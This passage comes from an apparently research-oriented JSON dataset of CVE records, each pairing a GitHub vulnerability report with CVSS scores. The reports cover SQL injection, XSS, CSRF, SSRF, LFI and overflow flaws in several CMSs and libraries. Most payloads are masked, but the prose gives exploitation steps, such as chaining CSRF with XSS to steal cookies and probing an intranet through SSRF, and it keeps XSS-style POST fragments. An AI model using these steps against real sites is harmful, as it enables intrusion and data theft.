  52320. "description": "host shared directory should be readonly. We need to make sure containers cannot modify host path unless it is explicitly shared to it. Right now we expose an additional top level shared directory to the guest and allow it to be modified. This is less ideal and can be enhanced by following method NUMBERTAG create two directories for each sandbox: . PATHTAG a directory to hold all host/guest shared mounts . PATHTAG a host/guest shared directory NUMBERTAG pfs/virtiofs source dir NUMBERTAG PATHTAG is bind mounted readonly to PATHTAG so guest cannot modify it NUMBERTAG host guest shared files/directories are mounted one level under PATHTAG and thus present to guest at one level under PATHTAG",
  52321. "vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:C/C:H/I:H/A:H",
  52322. "severity": "HIGH",
  52323. "baseScore": 8.8,
  52324. "impactScore": 6.0,
  52325. "exploitabilityScore": 2.0
  52326. },
  52327. {
  52328. "CVE_ID": "CVE-2020-20269",
  52329. "Issue_Url_old": "https://github.com/careteditor/issues/issues/841",
  52330. "Issue_Url_new": "https://github.com/careteditor/issues/issues/841",
  52331. "Repo_new": "careteditor/issues",
  52332. "Issue_Created_At": "2018-11-12T18:00:27Z",
  52333. "description": "Critical security issue in NUMBERTAG rc NUMBERTAG Hi guys, i found a critical security issue in APITAG and i would like to reach out to you privately so that i can give you the details without disclosing them publicly yet. Is there an email address i can write to?",
  52334. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
  52335. "severity": "CRITICAL",
  52336. "baseScore": 9.8,
  52337. "impactScore": 5.9,
  52338. "exploitabilityScore": 3.9
  52339. },
  52340. {
  52341. "CVE_ID": "CVE-2020-20294",
  52342. "Issue_Url_old": "https://github.com/arterli/CmsWing/issues/49",
  52343. "Issue_Url_new": "https://github.com/arterli/cmswing/issues/49",
  52344. "Repo_new": "arterli/cmswing",
  52345. "Issue_Created_At": "2019-10-10T03:26:21Z",
  52346. "description": "Vulnerability Report: cmswing NUMBERTAG code execution. Find a code execution vulnerability in cmswing project version APITAG PDF file for details FILETAG",
  52347. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
  52348. "severity": "CRITICAL",
  52349. "baseScore": 9.8,
  52350. "impactScore": 5.9,
  52351. "exploitabilityScore": 3.9
  52352. },
  52353. {
  52354. "CVE_ID": "CVE-2020-20295",
  52355. "Issue_Url_old": "https://github.com/arterli/CmsWing/issues/50",
  52356. "Issue_Url_new": "https://github.com/arterli/cmswing/issues/50",
  52357. "Repo_new": "arterli/cmswing",
  52358. "Issue_Created_At": "2019-10-10T03:56:23Z",
  52359. "description": "Vulnerability Report: cmswing NUMBERTAG APITAG sql injection. Find a code execution vulnerability in cmswing project version APITAG can be found in the analysis below. Vulnerability Location The vulnerability lies in the APITAG function in the APITAG CODETAG The variable data is the user behavior data transmitted by the front end. The function APITAG updates the user behavior using data. Due to the lack of data checking, SQL injection exists. When the user triggers the corresponding behavior, for example, adding articles, SQL statement execution will be triggered. Local Test Enter the background of the system, select user behavior\uff0cadd our payload to the rules of conduct FILETAG Add an article to trigger the user behavior just now. The SQL statement is executed successfully and the response time exceeds NUMBERTAG seconds. FILETAG FILETAG Database Execution Log FILETAG",
  52360. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
  52361. "severity": "CRITICAL",
  52362. "baseScore": 9.8,
  52363. "impactScore": 5.9,
  52364. "exploitabilityScore": 3.9
  52365. },
  52366. {
  52367. "CVE_ID": "CVE-2020-20296",
  52368. "Issue_Url_old": "https://github.com/arterli/CmsWing/issues/51",
  52369. "Issue_Url_new": "https://github.com/arterli/cmswing/issues/51",
  52370. "Repo_new": "arterli/cmswing",
  52371. "Issue_Created_At": "2019-10-10T04:00:45Z",
  52372. "description": "Vulnerability Report: cmswing NUMBERTAG user recharge sql injection. Find a code execution vulnerability in cmswing project version APITAG can be found in the analysis below. Vulnerability Location The vulnerability lies in the APITAG function in the APITAG CODETAG The variable APITAG represents the amount of recharge. The function APITAG increases the amount of money by the specified user, but lacks sufficient checks for APITAG , which results in SQL injection when database update operation is performed. Local Test Enter the background of the system, select user recharge FILETAG Modify the balance to APITAG . it was found that the replenishment was successful and the response time was extended by NUMBERTAG seconds, proving that our statement was successfully injected into the database for execution. FILETAG Database Execution Log FILETAG",
  52373. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
  52374. "severity": "CRITICAL",
  52375. "baseScore": 9.8,
  52376. "impactScore": 5.9,
  52377. "exploitabilityScore": 3.9
  52378. },
  52379. {
  52380. "CVE_ID": "CVE-2020-20341",
  52381. "Issue_Url_old": "https://github.com/yzmcms/yzmcms/issues/44",
  52382. "Issue_Url_new": "https://github.com/yzmcms/yzmcms/issues/44",
  52383. "Repo_new": "yzmcms/yzmcms",
  52384. "Issue_Created_At": "2020-03-27T07:58:13Z",
  52385. "description": "A SSRF in yzmcms NUMBERTAG management. \u540e\u53f0\u7f16\u8f91\u6587\u7ae0\u5904\uff0c\u6700\u4e0b\u65b9\u9009\u9879 APITAG PATHTAG APITAG FILETAG When modifying an article or adding an article, you chose to load a remote file locally,It will enter the APITAG , which matches the img tag in the article content, extracts the link and saves it in $ val = $ value, and then uses strpos to determine whether there is http in the link. If not, it returns directly (indicating that this is not an external network image link). Then read the first dot from right to left as the segmentation to get the suffix name, and then check the suffix on the white list. The suffix name here can be bypassed by APITAG . Then there are vulnerabilities APITAG readfile reads the file content and saves it to a jpg file. If readfile reads a file with warning or error, it will jump to the error handling function. payload\uff1a APITAG You can probe the intranet port and ip here. At the same time, here is also a file reading vulnerability, but reading php files may report an error. Try reading FILETAG because the YZMPHP_PATH variable is not declared and an error is reported.",
  52386. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N",
  52387. "severity": "HIGH",
  52388. "baseScore": 7.5,
  52389. "impactScore": 3.6,
  52390. "exploitabilityScore": 3.9
  52391. },
  52392. {
  52393. "CVE_ID": "CVE-2020-20343",
  52394. "Issue_Url_old": "https://github.com/taosir/wtcms/issues/8",
  52395. "Issue_Url_new": "https://github.com/taosir/wtcms/issues/8",
  52396. "Repo_new": "taosir/wtcms",
  52397. "Issue_Created_At": "2019-09-04T11:12:45Z",
  52398. "description": "There is one CSRF vulnerability that can add news. You can add articles in admin background, but there is a CSRF vulnerability. FILETAG FILETAG FILETAG FILETAG POC CODETAG",
  52399. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:H/A:N",
  52400. "severity": "MEDIUM",
  52401. "baseScore": 6.5,
  52402. "impactScore": 3.6,
  52403. "exploitabilityScore": 2.8
  52404. },
  52405. {
  52406. "CVE_ID": "CVE-2020-20344",
  52407. "Issue_Url_old": "https://github.com/taosir/wtcms/issues/9",
  52408. "Issue_Url_new": "https://github.com/taosir/wtcms/issues/9",
  52409. "Repo_new": "taosir/wtcms",
  52410. "Issue_Created_At": "2019-09-04T12:58:44Z",
  52411. "description": "Reflective XSS vulnerability exists in wtcms. Reflective XSS exists in keyword search area managed by administrator background articles url: URLTAG POC \"> APITAG <a src=\" FILETAG FILETAG",
  52412. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N",
  52413. "severity": "MEDIUM",
  52414. "baseScore": 5.4,
  52415. "impactScore": 2.7,
  52416. "exploitabilityScore": 2.3
  52417. },
  52418. {
  52419. "CVE_ID": "CVE-2020-20345",
  52420. "Issue_Url_old": "https://github.com/taosir/wtcms/issues/10",
  52421. "Issue_Url_new": "https://github.com/taosir/wtcms/issues/10",
  52422. "Repo_new": "taosir/wtcms",
  52423. "Issue_Created_At": "2019-09-04T13:48:48Z",
  52424. "description": "CSRF combines reflective XSS to obtain cookies. Reflective XSS exists in the administrator's page management office In the search box, enter \"> APITAG <a src=\" to trigger XSS FILETAG FILETAG Reuse CSRF vulnerability to obtain cookies FILETAG FILETAG FILETAG POC CODETAG",
  52425. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N",
  52426. "severity": "MEDIUM",
  52427. "baseScore": 5.4,
  52428. "impactScore": 2.7,
  52429. "exploitabilityScore": 2.3
  52430. },
  52431. {
  52432. "CVE_ID": "CVE-2020-20347",
  52433. "Issue_Url_old": "https://github.com/taosir/wtcms/issues/11",
  52434. "Issue_Url_new": "https://github.com/taosir/wtcms/issues/11",
  52435. "Repo_new": "taosir/wtcms",
  52436. "Issue_Created_At": "2019-09-05T11:45:33Z",
  52437. "description": "Storage XSS was found in three places. Three storage XSS were found in wtcms POC\uff1a APITAG APITAG on the background article management and fill in the XSS code at the source of the article FILETAG Find the published article in the front desk and click on the link to trigger XSS FILETAG FILETAG POC\uff1a APITAG APITAG on the background menu management, fill in the XSS code at the link, and finally click save FILETAG Find the location where the XSS code is inserted in the foreground and click to trigger the XSS attack FILETAG FILETAG POC\uff1a APITAG APITAG on the background links, fill in the XSS code at the link address, and finally click Save FILETAG Find the link address at the bottom of the front desk and click to trigger XSS FILETAG FILETAG",
  52438. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N",
  52439. "severity": "MEDIUM",
  52440. "baseScore": 5.4,
  52441. "impactScore": 2.7,
  52442. "exploitabilityScore": 2.3
  52443. },
  52444. {
  52445. "CVE_ID": "CVE-2020-20363",
  52446. "Issue_Url_old": "https://github.com/wind226/CVE/issues/1",
  52447. "Issue_Url_new": "https://github.com/wind226/cve/issues/1",
  52448. "Repo_new": "wind226/cve",
  52449. "Issue_Created_At": "2019-11-16T13:35:52Z",
  52450. "description": "Pbootcms background storage XSS. step1 Access admin page FILETAG step2 URLTAG FILETAG step3 FILETAG FILETAG ste4 XSS Trigger point FILETAG",
  52451. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:H/UI:R/S:C/C:L/I:L/A:N",
  52452. "severity": "MEDIUM",
  52453. "baseScore": 4.8,
  52454. "impactScore": 2.7,
  52455. "exploitabilityScore": 1.7
  52456. },
  52457. {
  52458. "CVE_ID": "CVE-2020-20389",
  52459. "Issue_Url_old": "https://github.com/GetSimpleCMS/GetSimpleCMS/issues/1321",
  52460. "Issue_Url_new": "https://github.com/getsimplecms/getsimplecms/issues/1321",
  52461. "Repo_new": "getsimplecms/getsimplecms",
  52462. "Issue_Created_At": "2019-12-01T16:05:56Z",
  52463. "description": "Cross Site Scripting(XSS) Vulnerability in Latest Release NUMBERTAG a FILETAG . Hi, I would like to report Cross Site Scripting(XSS) vulnerability in latest APITAG FILETAG . Description: Cross site scripting (XSS) vulnerability in FILETAG url: FILETAG You can Edit html source code in rich text editor,and execute APITAG code. payload: ERRORTAG FILETAG And visit index page. FILETAG",
  52464. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:H/UI:R/S:C/C:L/I:L/A:N",
  52465. "severity": "MEDIUM",
  52466. "baseScore": 4.8,
  52467. "impactScore": 2.7,
  52468. "exploitabilityScore": 1.7
  52469. },
  52470. {
  52471. "CVE_ID": "CVE-2020-20391",
  52472. "Issue_Url_old": "https://github.com/GetSimpleCMS/GetSimpleCMS/issues/1322",
  52473. "Issue_Url_new": "https://github.com/getsimplecms/getsimplecms/issues/1322",
  52474. "Repo_new": "getsimplecms/getsimplecms",
  52475. "Issue_Created_At": "2019-12-01T16:14:31Z",
  52476. "description": "Cross Site Scripting(XSS) Vulnerability in Latest Release NUMBERTAG a FILETAG . Hi, I would like to report Cross Site Scripting(XSS) vulnerability in latest APITAG FILETAG . Description: Cross site scripting (XSS) vulnerability in FILETAG url: FILETAG APITAG Snippet\u201d, input payload in snippets title payload: ERRORTAG and APITAG snippets\" FILETAG Last, visit FILETAG again. FILETAG FILETAG",
  52477. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N",
  52478. "severity": "MEDIUM",
  52479. "baseScore": 5.4,
  52480. "impactScore": 2.7,
  52481. "exploitabilityScore": 2.3
  52482. },
  52483. {
  52484. "CVE_ID": "CVE-2020-20392",
  52485. "Issue_Url_old": "https://github.com/peacexie/imcat/issues/5",
  52486. "Issue_Url_new": "https://github.com/peacexie/imcat/issues/5",
  52487. "Repo_new": "peacexie/imcat",
  52488. "Issue_Created_At": "2020-08-02T17:12:20Z",
  52489. "description": "Sql injection vulnerability in Latest Release NUMBERTAG product reviews. Hi, I would like to report Sql injection vulnerability in latest release NUMBERTAG product PATHTAG I found it in the demo( URLTAG Add a product reviews FILETAG Test the fm FILETAG payload: APITAG FILETAG payload APITAG FILETAG",
  52490. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
  52491. "severity": "CRITICAL",
  52492. "baseScore": 9.8,
  52493. "impactScore": 5.9,
  52494. "exploitabilityScore": 3.9
  52495. },
  52496. {
  52497. "CVE_ID": "CVE-2020-20412",
  52498. "Issue_Url_old": "https://github.com/stepmania/stepmania/issues/1890",
  52499. "Issue_Url_new": "https://github.com/stepmania/stepmania/issues/1890",
  52500. "Repo_new": "stepmania/stepmania",
  52501. "Issue_Created_At": "2019-09-10T06:39:53Z",
  52502. "description": "APITAG NUMBERTAG crash report. Architecture : Window NUMBERTAG Crash reason : Access violation (invalid address NUMBERTAG f NUMBERTAG Crashed thread : APITAG NUMBERTAG g WARNING: Continuing a non continuable exception APITAG Access violation code c NUMBERTAG first chance) First chance exceptions are reported before any exception handling. This exception may be expected and handled. APITAG NUMBERTAG b NUMBERTAG b NUMBERTAG mov eax,dword ptr [eax] ds NUMBERTAG b NUMBERTAG f NUMBERTAG dd NUMBERTAG f NUMBERTAG f NUMBERTAG fa NUMBERTAG fb2 ???????? ???????? ???????? ???????? ERRORTAG anaysis KEY_VALUES_STRING NUMBERTAG PROCESSES_ANALYSIS NUMBERTAG SERVICE_ANALYSIS NUMBERTAG STACKHASH_ANALYSIS NUMBERTAG TIMELINE_ANALYSIS NUMBERTAG Timeline: APITAG Name: APITAG Time NUMBERTAG APITAG Diff NUMBERTAG APITAG Timeline: APITAG Name: APITAG Time NUMBERTAG T NUMBERTAG Z Diff NUMBERTAG APITAG Timeline: APITAG Name: APITAG Time NUMBERTAG T NUMBERTAG Z Diff NUMBERTAG APITAG Timeline: APITAG Name: APITAG Time NUMBERTAG T NUMBERTAG Z Diff NUMBERTAG APITAG DUMP_CLASS NUMBERTAG DUMP_QUALIFIER NUMBERTAG FAULTING_IP: APITAG NUMBERTAG b NUMBERTAG b NUMBERTAG mov eax,dword ptr [eax] EXCEPTION_RECORD: (.exr NUMBERTAG APITAG NUMBERTAG b NUMBERTAG APITAG APITAG c NUMBERTAG APITAG violation) APITAG NUMBERTAG APITAG NUMBERTAG Parameter NUMBERTAG Parameter NUMBERTAG f NUMBERTAG Attempt to read from address NUMBERTAG f NUMBERTAG FAULTING_THREAD NUMBERTAG e3c DEFAULT_BUCKET_ID: INVALID_POINTER_READ PROCESS_NAME: FILETAG FOLLOWUP_IP: APITAG NUMBERTAG b NUMBERTAG b NUMBERTAG mov eax,dword ptr [eax] READ_ADDRESS NUMBERTAG f NUMBERTAG ERROR_CODE: (NTSTATUS NUMBERTAG c NUMBERTAG APITAG to get error code text> EXCEPTION_CODE: (NTSTATUS NUMBERTAG c NUMBERTAG APITAG to get error code text> EXCEPTION_CODE_STR: c NUMBERTAG EXCEPTION_PARAMETER NUMBERTAG EXCEPTION_PARAMETER NUMBERTAG f NUMBERTAG WATSON_BKT_PROCSTAMP NUMBERTAG ad1b NUMBERTAG WATSON_BKT_PROCVER NUMBERTAG 
PROCESS_VER_PRODUCT: APITAG WATSON_BKT_MODULE: ntdll.dll WATSON_BKT_MODSTAMP NUMBERTAG ddde NUMBERTAG WATSON_BKT_MODOFFSET NUMBERTAG WATSON_BKT_MODVER NUMBERTAG BUILD_VERSION_STRING: APITAG NUMBERTAG MODLIST_WITH_TSCHKSUM_HASH: APITAG MODLIST_SHA1_HASH: APITAG NTGLOBALFLAG NUMBERTAG APITAG NUMBERTAG APITAG NUMBERTAG APPLICATION_VERIFIER_FLAGS NUMBERTAG PRODUCT_TYPE NUMBERTAG SUITE_MASK NUMBERTAG DUMP_TYPE: fe ANALYSIS_SESSION_HOST: DESKTOP BLBI ANALYSIS_SESSION_TIME NUMBERTAG APITAG ANALYSIS_VERSION NUMBERTAG amd NUMBERTAG fre THREAD_ATTRIBUTES: OS_LOCALE: KOR BUGCHECK_STR: APITAG PRIMARY_PROBLEM_CLASS: APPLICATION_FAULT PROBLEM_CLASSES: ID NUMBERTAG n NUMBERTAG Type: [ APITAG Class: Addendum Scope: BUCKET_ID Name: Omit Data: Omit PID: APITAG TID NUMBERTAG e3c] Frame NUMBERTAG APITAG ID NUMBERTAG n NUMBERTAG Type: [INVALID_POINTER_READ] Class: Primary Scope: DEFAULT_BUCKET_ID APITAG Bucket ID prefix) BUCKET_ID Name: Add Data: Omit PID: APITAG TID NUMBERTAG e3c] Frame NUMBERTAG APITAG ID NUMBERTAG n NUMBERTAG Type: [ZEROED_STACK] Class: Addendum Scope: BUCKET_ID Name: Add Data: Omit PID NUMBERTAG TID NUMBERTAG e3c] Frame NUMBERTAG APITAG LAST_CONTROL_TRANSFER: from NUMBERTAG b NUMBERTAG c1 to NUMBERTAG b NUMBERTAG STACK_TEXT NUMBERTAG ff NUMBERTAG b NUMBERTAG c NUMBERTAG a2de NUMBERTAG a2de NUMBERTAG fcc APITAG NUMBERTAG ff9dc NUMBERTAG e NUMBERTAG c NUMBERTAG a2de8 APITAG NUMBERTAG ffa NUMBERTAG ea6fc NUMBERTAG ffb NUMBERTAG ffbb8 APITAG NUMBERTAG ffa NUMBERTAG fde NUMBERTAG c NUMBERTAG ca NUMBERTAG e0 APITAG WARNING: Stack unwind information not available. 
Following frames may be wrong NUMBERTAG ffa6c NUMBERTAG f NUMBERTAG e NUMBERTAG ca NUMBERTAG e NUMBERTAG ffaf NUMBERTAG b8b APITAG NUMBERTAG ffa NUMBERTAG b8b NUMBERTAG ca NUMBERTAG e NUMBERTAG b8fc NUMBERTAG APITAG NUMBERTAG ffaf NUMBERTAG c NUMBERTAG ffbb NUMBERTAG ffb NUMBERTAG ffb NUMBERTAG APITAG NUMBERTAG ffb5c NUMBERTAG ec NUMBERTAG ffbb NUMBERTAG APITAG NUMBERTAG ffb NUMBERTAG e NUMBERTAG a NUMBERTAG ffbb NUMBERTAG ffba NUMBERTAG ffb9c APITAG NUMBERTAG ffbe NUMBERTAG dfbf NUMBERTAG b8fc4aa NUMBERTAG fc3c NUMBERTAG APITAG NUMBERTAG ffc NUMBERTAG d NUMBERTAG ef NUMBERTAG f NUMBERTAG a NUMBERTAG b8fc4e6 APITAG NUMBERTAG ffc NUMBERTAG fd2fc NUMBERTAG b8fc5a NUMBERTAG a NUMBERTAG c4 APITAG NUMBERTAG ffd0c NUMBERTAG e2d NUMBERTAG f NUMBERTAG ffd NUMBERTAG APITAG NUMBERTAG ffd NUMBERTAG e NUMBERTAG c3fdd APITAG NUMBERTAG ffd NUMBERTAG c NUMBERTAG df NUMBERTAG c NUMBERTAG ffddc APITAG NUMBERTAG ffd NUMBERTAG d NUMBERTAG d NUMBERTAG df NUMBERTAG fa NUMBERTAG e NUMBERTAG APITAG NUMBERTAG ffddc NUMBERTAG d NUMBERTAG fd ffffffff NUMBERTAG f NUMBERTAG c NUMBERTAG APITAG NUMBERTAG ffdec NUMBERTAG e7b NUMBERTAG df NUMBERTAG APITAG STACK_COMMAND NUMBERTAG s ; .cxr ; kb THREAD_SHA1_HASH_MOD_FUNC: APITAG APITAG APITAG THREAD_SHA1_HASH_MOD: APITAG FAULT_INSTR_CODE NUMBERTAG b NUMBERTAG b SYMBOL_STACK_INDE NUMBERTAG SYMBOL_NAME: APITAG FOLLOWUP_NAME: APITAG MODULE_NAME: ntdll NUMBERTAG IMAGE_NAME: ntdll.dll DEBUG_FLR_IMAGE_TIMESTAMP NUMBERTAG ddde NUMBERTAG FAILURE_BUCKET_ID: APITAG BUCKET_ID: APITAG FAILURE_EXCEPTION_CODE: c NUMBERTAG FAILURE_IMAGE_NAME: ntdll.dll BUCKET_ID_IMAGE_STR: ntdll.dll FAILURE_MODULE_NAME: ntdll NUMBERTAG BUCKET_ID_MODULE_STR: ntdll NUMBERTAG FAILURE_FUNCTION_NAME: APITAG BUCKET_ID_FUNCTION_STR: APITAG BUCKET_ID_OFFSET NUMBERTAG a2 BUCKET_ID_MODTIMEDATESTAMP NUMBERTAG ddde NUMBERTAG BUCKET_ID_MODCHECKSUM NUMBERTAG a NUMBERTAG d BUCKET_ID_MODVER_STR NUMBERTAG BUCKET_ID_PREFIX_STR: APITAG FAILURE_PROBLEM_CLASS: APPLICATION_FAULT FAILURE_SYMBOL_NAME: 
APITAG WATSON_STAGEONE_URL: URLTAG TARGET_TIME NUMBERTAG APITAG OSBUILD NUMBERTAG OSSERVICEPACK NUMBERTAG SERVICEPACK_NUMBER NUMBERTAG OS_REVISION NUMBERTAG OSPLATFORM_TYPE NUMBERTAG OSNAME: Windows NUMBERTAG OSEDITION: Windows NUMBERTAG APITAG APITAG USER_LCID NUMBERTAG OSBUILD_TIMESTAMP: unknown_date BUILDDATESTAMP_STR NUMBERTAG BUILDLAB_STR: rs5_release BUILDOSVER_STR: APITAG NUMBERTAG APITAG NUMBERTAG ANALYSIS_SOURCE: UM FAILURE_ID_HASH_STRING: APITAG FAILURE_ID_HASH: {d7fe NUMBERTAG f NUMBERTAG f NUMBERTAG f5d1b2edc8b}",
  52503. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
  52504. "severity": "MEDIUM",
  52505. "baseScore": 6.5,
  52506. "impactScore": 3.6,
  52507. "exploitabilityScore": 2.8
  52508. },
  52509. {
  52510. "CVE_ID": "CVE-2020-20425",
  52511. "Issue_Url_old": "https://github.com/Sea0o/vulnerability/issues/1",
  52512. "Issue_Url_new": "https://github.com/str1am/vulnerability/issues/1",
  52513. "Repo_new": "str1am/vulnerability",
  52514. "Issue_Created_At": "2019-10-17T02:00:20Z",
  52515. "description": "s cms Government station building system exists XSS. \u6253\u5f00\u9996\u9875 FILETAG \u70b9\u51fb\u653f\u5e9c\u5efa\u7ad9\u7cfb\u7edf\u5f97\u9884\u89c8\uff0c\u8fdb\u5165\u9884\u89c8\u7f51\u7ad9 FILETAG APITAG APITAG \u6210\u529f\u5f39\u7a97 FILETAG FILETAG",
  52516. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N",
  52517. "severity": "MEDIUM",
  52518. "baseScore": 6.1,
  52519. "impactScore": 2.7,
  52520. "exploitabilityScore": 2.8
  52521. },
  52522. {
  52523. "CVE_ID": "CVE-2020-20426",
  52524. "Issue_Url_old": "https://github.com/Sea0o/vulnerability/issues/2",
  52525. "Issue_Url_new": "https://github.com/str1am/vulnerability/issues/2",
  52526. "Repo_new": "str1am/vulnerability",
  52527. "Issue_Created_At": "2019-10-17T03:38:39Z",
  52528. "description": "s cms Multiple XSS exist in / function / FILETAG in Government station building system. in / function / FILETAG , FILETAG FILETAG APITAG payload\uff1a FILETAG POST\uff1aG_title=\"> APITAG &G_mail= EMAILTAG &G_phone NUMBERTAG FILETAG POST\uff1aG_name=\"> APITAG &G_mail= EMAILTAG &G_phone NUMBERTAG FILETAG POST\uff1aG_msg=\"> APITAG &G_mail= EMAILTAG &G_phone NUMBERTAG FILETAG",
  52529. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N",
  52530. "severity": "MEDIUM",
  52531. "baseScore": 6.1,
  52532. "impactScore": 2.7,
  52533. "exploitabilityScore": 2.8
  52534. },
  52535. {
  52536. "CVE_ID": "CVE-2020-20444",
  52537. "Issue_Url_old": "https://github.com/jact/openclinic/issues/8",
  52538. "Issue_Url_new": "https://github.com/jact/openclinic/issues/8",
  52539. "Repo_new": "jact/openclinic",
  52540. "Issue_Created_At": "2019-09-15T01:19:29Z",
  52541. "description": "LFI on APITAG Admin. APITAG : FILETAG Impact : Anyone logged in to the admin account can read files from server like config and maybe can get RCE URLTAG . Fix : remove the FILETAG or you can blacklist the dot and slashes . Hitman APITAG | Blackfoxs Team .",
  52542. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H",
  52543. "severity": "HIGH",
  52544. "baseScore": 7.2,
  52545. "impactScore": 5.9,
  52546. "exploitabilityScore": 1.2
  52547. },
  52548. {
  52549. "CVE_ID": "CVE-2020-20486",
  52550. "Issue_Url_old": "https://github.com/airpig2011/IEC104/issues/14",
  52551. "Issue_Url_new": "https://github.com/airpig2011/iec104/issues/14",
  52552. "Repo_new": "airpig2011/iec104",
  52553. "Issue_Created_At": "2019-09-23T11:15:59Z",
  52554. "description": "stack buffer overflow at APITAG Hi there, __stack buffer overflow__ in APITAG Snip APITAG ERRORTAG ASAN OUTPUT ERRORTAG",
  52555. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H",
  52556. "severity": "HIGH",
  52557. "baseScore": 7.5,
  52558. "impactScore": 3.6,
  52559. "exploitabilityScore": 3.9
  52560. },
  52561. {
  52562. "CVE_ID": "CVE-2020-20490",
  52563. "Issue_Url_old": "https://github.com/fcovatti/libiec_iccp_mod/issues/5",
  52564. "Issue_Url_new": "https://github.com/fcovatti/libiec_iccp_mod/issues/5",
  52565. "Repo_new": "fcovatti/libiec_iccp_mod",
  52566. "Issue_Created_At": "2019-10-10T06:21:33Z",
  52567. "description": "Heap buffer overflow found in client_example1.c. Hello, I found a potential heap buffer overflow in PATHTAG it seems that in some cases, when the packet cannot be accepted, the program throws and causes a heap buffer overflow. APITAG are steps followed to reproduce crash__ Download latest source code from: PATHTAG compiled with clang and ASAN APITAG before make ASAN Output: ERRORTAG",
  52568. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H",
  52569. "severity": "HIGH",
  52570. "baseScore": 7.5,
  52571. "impactScore": 3.6,
  52572. "exploitabilityScore": 3.9
  52573. },
  52574. {
  52575. "CVE_ID": "CVE-2020-20495",
  52576. "Issue_Url_old": "https://github.com/bludit/bludit/issues/1246",
  52577. "Issue_Url_new": "https://github.com/bludit/bludit/issues/1246",
  52578. "Repo_new": "bludit/bludit",
  52579. "Issue_Created_At": "2020-07-31T01:29:29Z",
  52580. "description": "Arbitrary zip file deletion vulnerability in backup plugin. bludit NUMBERTAG has an arbitrary zip file deletion vulnerability in backup plugin NUMBERTAG put a ' FILETAG ' in root directory FILETAG NUMBERTAG replace cookie and APITAG and repeat the post data . CODETAG NUMBERTAG can see the install.zip has been deleted . FILETAG",
  52581. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:H/A:H",
  52582. "severity": "CRITICAL",
  52583. "baseScore": 9.1,
  52584. "impactScore": 5.2,
  52585. "exploitabilityScore": 3.9
  52586. },
  52587. {
  52588. "CVE_ID": "CVE-2020-20508",
  52589. "Issue_Url_old": "https://github.com/samnabi/shopkit/issues/223",
  52590. "Issue_Url_new": "https://github.com/samnabi/shopkit/issues/223",
  52591. "Repo_new": "samnabi/shopkit",
  52592. "Issue_Created_At": "2019-09-23T04:34:50Z",
  52593. "description": "Login hijacking in register. In the latest version NUMBERTAG First, I found a reflective XSS vulnerability in register. The payload is: ERRORTAG FILETAG Then, I found this XSS vulnerability could cause login hijacking The payload is: CODETAG When the user enters a username via this link, as shown below FILETAG Then click on the \"log in\" The username and password will be submitted to my link. FILETAG",
  52594. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N",
  52595. "severity": "MEDIUM",
  52596. "baseScore": 6.1,
  52597. "impactScore": 2.7,
  52598. "exploitabilityScore": 2.8
  52599. },
  52600. {
  52601. "CVE_ID": "CVE-2020-20514",
  52602. "Issue_Url_old": "https://github.com/magicblack/maccms10/issues/76",
  52603. "Issue_Url_new": "https://github.com/magicblack/maccms10/issues/76",
  52604. "Repo_new": "magicblack/maccms10",
  52605. "Issue_Created_At": "2019-10-22T12:07:51Z",
  52606. "description": "There is a CSRF vulnerability that can del the administrator account. After the administrator logged in, open the following page. POC: CODETAG Then administrator users numbered NUMBERTAG will be deleted. If the administrators are all deleted, no one can log in.",
  52607. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:H/A:H",
  52608. "severity": "HIGH",
  52609. "baseScore": 8.1,
  52610. "impactScore": 5.2,
  52611. "exploitabilityScore": 2.8
  52612. },
  52613. {
  52614. "CVE_ID": "CVE-2020-20582",
  52615. "Issue_Url_old": "https://github.com/sansanyun/mipcms5/issues/5",
  52616. "Issue_Url_new": "https://github.com/sansanyun/mipjz/issues/5",
  52617. "Repo_new": "sansanyun/mipjz",
  52618. "Issue_Created_At": "2019-09-29T07:35:36Z",
  52619. "description": "There is one SSRF vulnerability that can get some sensitive information. Vulnerability location\uff1a APITAG \uff1a FILETAG The problem arises in line NUMBERTAG CODETAG Using curl_exec, APITAG is controllable and only trim is made to the APITAG parameter in the above code without any filtering, and finally the json encoded data is returned. poc: APITAG FILETAG",
  52620. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N",
  52621. "severity": "HIGH",
  52622. "baseScore": 7.5,
  52623. "impactScore": 3.6,
  52624. "exploitabilityScore": 3.9
  52625. },
  52626. {
  52627. "CVE_ID": "CVE-2020-20583",
  52628. "Issue_Url_old": "https://github.com/0xyu/PHP_Learning/issues/1",
  52629. "Issue_Url_new": "https://github.com/0xyu/php_learning/issues/1",
